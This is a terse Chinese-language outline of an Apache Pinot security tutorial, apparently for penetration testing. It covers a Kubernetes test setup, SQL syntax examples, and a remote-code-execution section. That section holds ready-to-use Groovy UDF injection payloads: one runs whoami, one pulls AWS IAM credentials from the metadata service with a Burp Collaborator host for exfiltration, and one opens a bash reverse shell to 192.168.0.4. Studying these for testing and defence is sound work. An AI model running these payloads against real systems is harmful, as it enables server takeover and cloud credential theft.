引言
Apache Pinot简介
架构细节
测试环境搭建
通过Kubernetes快速启动Minikube。
安装Pinot Helm图表。
通过Kafka进行数据摄取。
暴露控制器端口以访问查询编辑器和集群管理UI。
SQL语法与注入基础
-- 字符串处理SELECT "someColumn", 'a ''string'' with quotes', CONCAT('abc','efg','d') FROM myTable;-- 子字符串SELECT SUBSTR('abcdef', -3, -1) FROM ignoreMe -- 'def'-- 过滤器SELECT * FROM airlineStatsAvro WHERE 0 = Year - Year AND ArrTimeBlk != 'blahblah-bc'
远程代码执行(RCE)
-- 获取当前用户信息SELECT * FROM myTable WHERE groovy('{"returnType":"INT","isSingleValue":true}', 'println "whoami".execute().text; return 1') = 1 limit 5;-- 窃取AWS临时IAM凭据SELECT * FROM myTable WHERE groovy('{"returnType":"INT","isSingleValue":true}', 'def aws = "169.254.169.254/latest/meta-data/iam/security-credentials/"; def collab = "xyz.burpcollaborator.net/"; def role = "curl -s ${aws}".execute().text.split("\n")[0].trim(); def creds = "curl -s ${aws}${role}".execute().text;') = 1;-- 创建反向ShellSELECT * FROM myTable WHERE groovy('{"returnType":"INT","isSingleValue":true}', '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/443 0>&1"].execute(); return 1') = 1;
